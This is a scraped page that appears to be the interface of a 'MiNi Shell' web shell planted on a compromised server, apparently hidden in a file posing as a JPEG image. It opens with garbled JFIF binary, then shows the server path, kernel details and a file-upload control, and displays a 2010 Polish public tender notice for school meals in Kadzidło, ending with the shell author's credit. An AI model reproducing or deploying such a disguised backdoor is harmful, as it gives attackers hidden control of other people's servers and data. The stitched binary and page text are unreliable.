JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/4658-N-2010.html

<p class="kh_header"><b>Kadzidło: Dożywianie uczniów w szkołach na terenie gminy Kadzidło w  roku 2010.</b><br>
<b>Numer ogłoszenia: 4658 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Targowa 4, 07-420 Kadzidło, woj. mazowieckie, tel. 029 7618934, faks 029 7618934.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.kadzidlo.samorzady.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie uczniów w szkołach na terenie gminy Kadzidło w  roku 2010..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności: Przygotowanie , dostarczenie i wydanie do szkół na terenie Gminy Kadzidło: w szkołach podstawowych w Glebie, Kierzku, Siarczej Łące, Jazgarce, Czarni, Piaseczni w Zespole Szkół w Dylewie, Chudku, Wachu gorącego posiłku składającego się z zupy 300ml z pieczywem -  zwykła bułka lub dwie kromki chleba  przez 5 dni w tygodniu z wyłączeniem dni wolnych od zajęć. Gorącym posiłkiem planuje się objąć około 395 uczniów. Posiłki winny być dostosowane do wymogów sanitarnych dotyczących bezpieczeństwa zdrowotnego oraz wartości energetycznej i odżywczej racji pokarmowych dla żywionych grup wiekowych od 5 do 16 lat . Wykonawca zapewni: transport gorących posiłków do szkół w odpowiednich naczyniach (termosy), porcjowanie i wydanie posiłków w naczyniach jednorazowego użytku, opracowanie tygodniowego jadłospisu. Jednorazowe naczynia do spożywania posiłków dostarczy Wykonawca i będą one wkalkulowane w koszty posiłków. Zamawiający udostępni nieodpłatnie pomieszczenia do porcjowania, wydawania oraz spożywania posiłków. Po spożyciu posiłków, wykonawca na własny koszt usunie z terenu szkoły zużyte naczynia jednorazowego użytku oraz wszelkie odpadki żywnościowe. Zamawiający zastrzega, iż liczba uczniów korzystających z posiłków może być w każdym miesiącu inna. Zamawiający zastrzega, iż liczba dzieci zadeklarowanych na dany miesiąc może ulec zmianie w sytuacjach, których Zamawiający nie mógł przewidzieć np. z powodu choroby dziecka..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 47.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca powinien spełniać następujące warunki:
1)	Spełnia warunki, o których mowa w art. 22 ust. 1 ustawy, w tym nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy .
2)	Posiada uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - tj. prowadzi zarejestrowaną działalność gospodarczą w zakresie objętym przedmiotowym zamówieniem.
3)	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. 
      - należy wykazać zdolność kredytową lub posiadanie środków własnych niezbędnych do
         wykonania zamówienia przez okres 1 miesiąca
- ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności .  
4)  Posiada niezbędną wiedzę i doświadczenie -  tj. musi potwierdzić wykonanie w ciągu ostatnich
     trzech lat , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie co
     najmniej 1 usługi  o wartości nie mniejszej od niniejszego zamówienia  z podaniem daty i
     miejsca wykonania oraz dokumentem potwierdzającym , że usługi  te zostały wykonane
     należycie (załącznik Nr 4 do SIWZ)  
5) Dysponuje odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
    - Wykonawca dysponuje zapleczem gastronomicznym, które spełnia wymagania określone
   rozporządzeniem (WE) nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia       2004r. w sprawie higieny środków spożywczych ( Dz.Urz. UE L 139 z 30 kwietnia 2004 r.) w zakresie prowadzenia działalności gastronomicznej oraz zapewnienia bezpieczeństwa produkowanej i wprowadzanej do obrotu żywności.
- Wykonawca dysponuje personelem posiadającym aktualne orzeczenia lekarskie do celów
   sanitarno - epidemiologicznych - wykaz osób , które będą dostarczały i rozdzielały posiłki wraz
    z aktualnymi orzeczeniami lekarskimi Wykonawca przedłoży Zamawiającemu przed
    podpisaniem umowy na realizację zamówienia.
- Wykonawca dysponuje  środkami transportu, spełniającymi wymagania sanitarne -
    Stosowny dokument potwierdzający spełnienie tych warunków należy przedłożyć
    Zamawiającemu przed podpisaniem umowy na realizację zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca powinien złożyć następujące oświadczenia i dokumenty:
1)	Wypełniony formularz oferty ( załącznik nr 1 do SWIZ )
2)	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ),
3)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4)	Zaświadczenie o nie zaleganiu w opłacaniu podatku w Urzędzie Skarbowym 
5)	Zaświadczenie o nie zaleganiu w opłacaniu składek w Zakładzie Ubezpieczeń Społecznych lub w Kasie rolniczego Ubezpieczenia Społecznego
6)	Zaświadczenie z banku potwierdzające zdolność kredytową bądź posiadanie własnych środków niezbędnych do wykonania zamówienia przez okres 1 miesiąca.
7)  Kopię polisy potwierdzającej ubezpieczenie od odpowiedzialności cywilnej w zakresie
     prowadzonej działalności 
8)  Decyzja bądź zaświadczenie Państwowego Powiatowego Inspektora Sanitarnego o wpisie
     do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji
     Sanitarnej lub Zaświadczenie Powiatowego Lekarza Weterynarii  o wpisie do rejestru
     zakładów nadzorowanych przez Powiatowego Lekarza Weterynarii wraz z potwierdzeniem
     przez organ wydający aktualności dokumentu wystawione nie wcześniej niż 30 dni przed
     terminem składania.
9) Oświadczenie o dysponowaniu zapleczem gastronomicznym, środkami transportu
   spełniającymi wymagania sanitarne, naczyniami , termosami , oraz osobami  niezbędnymi
    do wykonania zamówienia (załącznik nr 5 do SIWZ)
10)  Wykaz zamówień zrealizowanych przez oferenta w ciągu trzech lat wraz z referencjami ,
    opiniami - (załącznik nr 4 do SIWZ)
11) Parafowany przez Wykonawcę wzór umowy ( załącznik nr 3 do SIWZ ).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.kadzidlo.samorzady.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Kadzidle ul. Targowa 4, pokój numer 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2010 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Kadzidle ul. Targowa 4, pokój numer 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com